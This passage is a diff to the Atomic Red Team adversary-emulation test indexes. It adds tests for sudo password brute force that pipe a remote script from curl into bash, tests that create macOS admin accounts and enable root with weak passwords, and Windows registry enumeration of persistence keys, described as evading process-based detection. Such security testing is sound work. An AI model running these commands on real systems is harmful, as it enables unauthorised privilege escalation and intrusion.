+          description: url of remote payload
+          type: Url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Check if running on a Redhat based machine.
+
+          '
+        prereq_command: |
+          if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
+          if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
+          if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+          if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+        get_prereq_command: 'yum update && yum install -y openssl sudo curl
+
+          '
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
+          su art
+          cd /tmp
+          curl -s #{remote_url} |bash
+        cleanup_command: 'userdel -fr art
+
+          '
   T1003:
     technique:
       x_mitre_platforms:
@@ -84600,7 +84730,7 @@ discovery:
           $file = "rad" + $rad + ".tmp"
 
           whoami.exe /all >> #{output_path}\$file
-        cleanup_command: 'Remove-Item -Path $env:temp\rad*.tmp -Force
+        cleanup_command: 'Remove-Item -Path #{output_path}\rad*.tmp -Force
 
           '
         name: powershell
@@ -90186,8 +90316,45 @@ discovery:
           reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
           reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
           reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+          reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
+          reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
+          reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
         name: command_prompt
         elevation_required: true
+    - name: Query Registry with Powershell cmdlets
+      auto_generated_guid: 0434d081-bb32-42ce-bcbb-3548e4f2628f
+      description: "Query Windows Registry with Powershell cmdlets, i.e., Get-Item
+        and Get-ChildItem. The results from above can also be achieved with Get-Item
+        and Get-ChildItem.\nUnlike using \"reg query\" which then executes reg.exe,
+        using cmdlets won't generate new processes, which may evade detection systems
+        monitoring process generation. \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: "Get-Item -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\"\nGet-ChildItem
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\\" | findstr
+          Windows\nGet-Item -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"\nGet-Item
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nGet-Item
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"\nGet-ChildItem
+          -Path \"HKLM:system\\currentcontrolset\\services\" \nGet-Item -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nGet-Item
+          -Path \"HKLM:SYSTEM\\CurrentControlSet\\Control\\SafeBoot\"\nGet-ChildItem
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Active Setup\\Installed Components\"\nGet-ChildItem
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Scripts\\Startup\"\n"
+        name: powershell
+        elevation_required: true
     - name: Enumerate COM Objects in Registry with Powershell
       auto_generated_guid: 0d80d088-a84c-4353-af1a-fc8b439f1564
       description: "This test is designed to enumerate the COM objects listed in HKCR,
@@ -104979,6 +105146,45 @@ initial-access:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
     - name: WinPwn - Loot local Credentials - powerhell kittie
       auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
       description: Loot local Credentials - powerhell kittie technique via function

atomics/Indexes/linux-index.yaml

@@ -50793,81 +50793,92 @@ credential-access:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1110.001
     atomic_tests:
-    - name: SUDO brute force Debian
-      auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
-      description: |
-        Attempts to sudo with current user using passwords from a list.  Will run sudo 3 times, each with 3 different password attempts.
-        PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
-        If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
-        The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
+    - name: SUDO Brute Force - Debian
+      auto_generated_guid: ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
+      description: "An adversary may find themselves on a box (e.g. via ssh key auth,
+        with no password) with a user that has sudo'ers privileges, but they do not
+        know the users password. Normally, failed attempts to access root will not
+        cause the root account to become locked, to prevent denial-of-service. This
+        functionality enables an attacker to undertake a local brute force password
+        guessing attack without locking out the root user. \n\nThis test creates the
+        \"art\" user with a password of \"password123\", logs in, downloads and executes
+        the sudo_bruteforce.sh which brute force guesses the password, then deletes
+        the user\n"
       supported_platforms:
       - linux
-      dependency_executor_name: sh
+      input_arguments:
+        remote_url:
+          description: url of remote payload
+          type: Url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+      dependency_executor_name: bash
       dependencies:
       - description: 'Check if running on a Debian based machine.
 
           '
         prereq_command: |
-          if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
+          if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
           if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
-          cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
-          cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
-          if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-        get_prereq_command: 'apt-get update && apt-get install -y sudo
+          if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+          if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+        get_prereq_command: 'apt update && apt install -y openssl sudo curl
 
           '
       executor:
-        elevation_required: false
+        name: bash
+        elevation_required: true
         command: |
-          for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
-          echo done
-        cleanup_command: 'rm -f /tmp/asker /tmp/workingfile
+          useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
+          su art
+          cd /tmp
+          curl -s #{remote_url} |bash
+        cleanup_command: 'userdel -fr art
 
           '
-        name: sh
-    - name: SUDO brute force Redhat
-      auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade
-      description: "Brute force the password of a local user account which is a member
-        of the sudo'ers group on a Redhat based Linux distribution.  \n"
+    - name: SUDO Brute Force - Redhat
+      auto_generated_guid: 4097bc00-5eeb-4d56-aaf9-287d60351d95
+      description: "An adversary may find themselves on a box (e.g. via ssh key auth,
+        with no password) with a user that has sudo'ers privileges, but they do not
+        know the users password. Normally, failed attempts to access root will not
+        cause the root account to become locked, to prevent denial-of-service. This
+        functionality enables an attacker to undertake a local brute force password
+        guessing attack without locking out the root user. \n\nThis test creates the
+        \"art\" user with a password of \"password123\", logs in, downloads and executes
+        the sudo_bruteforce.sh which brute force guesses the password, then deletes
+        the user\n"
       supported_platforms:
       - linux
-      dependency_executor_name: sh
+      input_arguments:
+        remote_url:
+          description: url of remote payload
+          type: Url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+      dependency_executor_name: bash
       dependencies:
       - description: 'Check if running on a Redhat based machine.
 
           '
         prereq_command: |
-          if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
+          if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
           if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
-          if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-          if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
-        get_prereq_command: 'yum -y update && yum install -y openssl sudo
+          if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+          if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+        get_prereq_command: 'yum update && yum install -y openssl sudo curl
 
           '
       executor:
+        name: bash
         elevation_required: true
         command: |
-          useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
-          su target
-
-          PASSWORDS=(one two three password five); \
-              touch /tmp/file; \
-              for P in ${PASSWORDS[@]}; do \
-                  date +"%b %d %T"; \
-                  sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
-                  echo "exit: $?"; \
-                  if grep -q "root" /tmp/file; then \
-                      echo "FOUND: sudo => $P"; break; \
-                  else \
-                      echo "TRIED: $P"; \
-                  fi; \
-                  sleep 2; \
-              done; \
-              rm /tmp/file
-        cleanup_command: 'userdel target
+          useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
+          su art
+          cd /tmp
+          curl -s #{remote_url} |bash
+        cleanup_command: 'userdel -fr art
 
           '
-        name: sh
   T1003:
     technique:
       x_mitre_platforms:

atomics/Indexes/macos-index.yaml

@@ -16429,6 +16429,45 @@ defense-evasion:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
   T1211:
     technique:
       x_mitre_platforms:
@@ -26969,6 +27008,45 @@ privilege-escalation:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
   T1574.012:
     technique:
       x_mitre_platforms:
@@ -43386,6 +43464,45 @@ persistence:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
   T1574.012:
     technique:
       x_mitre_platforms:
@@ -68049,6 +68166,45 @@ initial-access:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
 exfiltration:
   T1567:
     technique:

atomics/Indexes/windows-index.yaml

@@ -73739,7 +73739,7 @@ discovery:
           $file = "rad" + $rad + ".tmp"
 
           whoami.exe /all >> #{output_path}\$file
-        cleanup_command: 'Remove-Item -Path $env:temp\rad*.tmp -Force
+        cleanup_command: 'Remove-Item -Path #{output_path}\rad*.tmp -Force
 
           '
         name: powershell
@@ -78041,8 +78041,45 @@ discovery:
           reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
           reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
           reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+          reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
+          reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
+          reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
         name: command_prompt
         elevation_required: true
+    - name: Query Registry with Powershell cmdlets
+      auto_generated_guid: 0434d081-bb32-42ce-bcbb-3548e4f2628f
+      description: "Query Windows Registry with Powershell cmdlets, i.e., Get-Item
+        and Get-ChildItem. The results from above can also be achieved with Get-Item
+        and Get-ChildItem.\nUnlike using \"reg query\" which then executes reg.exe,
+        using cmdlets won't generate new processes, which may evade detection systems
+        monitoring process generation. \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: "Get-Item -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\"\nGet-ChildItem
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\\" | findstr
+          Windows\nGet-Item -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"\nGet-Item
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nGet-Item
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"\nGet-ChildItem
+          -Path \"HKLM:system\\currentcontrolset\\services\" \nGet-Item -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nGet-Item
+          -Path \"HKLM:SYSTEM\\CurrentControlSet\\Control\\SafeBoot\"\nGet-ChildItem
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Active Setup\\Installed Components\"\nGet-ChildItem
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Scripts\\Startup\"\n"
+        name: powershell
+        elevation_required: true
     - name: Enumerate COM Objects in Registry with Powershell
       auto_generated_guid: 0d80d088-a84c-4353-af1a-fc8b439f1564
       description: "This test is designed to enumerate the COM objects listed in HKCR,

atomics/T1012/T1012.md

@@ -8,7 +8,9 @@ The Registry contains a significant amount of information about the operating sy
 
 - [Atomic Test #1 - Query Registry](#atomic-test-1---query-registry)
 
-- [Atomic Test #2 - Enumerate COM Objects in Registry with Powershell](#atomic-test-2---enumerate-com-objects-in-registry-with-powershell)
+- [Atomic Test #2 - Query Registry with Powershell cmdlets](#atomic-test-2---query-registry-with-powershell-cmdlets)
+
+- [Atomic Test #3 - Enumerate COM Objects in Registry with Powershell](#atomic-test-3---enumerate-com-objects-in-registry-with-powershell)
 
 
 <br/>
@@ -55,6 +57,9 @@ reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
 reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
 reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
+reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
+reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
 ```
 
 
@@ -65,7 +70,58 @@ reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
 <br/>
 <br/>
 
-## Atomic Test #2 - Enumerate COM Objects in Registry with Powershell
+## Atomic Test #2 - Query Registry with Powershell cmdlets
+Query Windows Registry with Powershell cmdlets, i.e., Get-Item and Get-ChildItem. The results from above can also be achieved with Get-Item and Get-ChildItem.
+Unlike using "reg query" which then executes reg.exe, using cmdlets won't generate new processes, which may evade detection systems monitoring process generation.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0434d081-bb32-42ce-bcbb-3548e4f2628f
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
+Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\" | findstr Windows
+Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
+Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
+Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServices"
+Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServices"
+Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
+Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
+Get-Item -Path "HKCU:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
+Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
+Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"
+Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnce"
+Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnceEx"
+Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
+Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Run"
+Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunOnce"
+Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+Get-ChildItem -Path "HKLM:system\currentcontrolset\services" 
+Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
+Get-Item -Path "HKLM:SYSTEM\CurrentControlSet\Control\SafeBoot"
+Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Active Setup\Installed Components"
+Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Enumerate COM Objects in Registry with Powershell
 This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file.
 An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes. 
 See: https://www.mandiant.com/resources/hunting-com-objects

atomics/T1012/T1012.yaml

@@ -34,8 +34,45 @@ atomic_tests:
       reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
       reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
       reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+      reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
+      reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
+      reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
     name: command_prompt
     elevation_required: true
+- name: Query Registry with Powershell cmdlets
+  auto_generated_guid: 0434d081-bb32-42ce-bcbb-3548e4f2628f
+  description: |
+    Query Windows Registry with Powershell cmdlets, i.e., Get-Item and Get-ChildItem. The results from above can also be achieved with Get-Item and Get-ChildItem.
+    Unlike using "reg query" which then executes reg.exe, using cmdlets won't generate new processes, which may evade detection systems monitoring process generation. 
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
+      Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\" | findstr Windows
+      Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
+      Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
+      Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServices"
+      Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServices"
+      Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
+      Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
+      Get-Item -Path "HKCU:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
+      Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
+      Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"
+      Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnce"
+      Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnceEx"
+      Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
+      Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Run"
+      Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunOnce"
+      Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
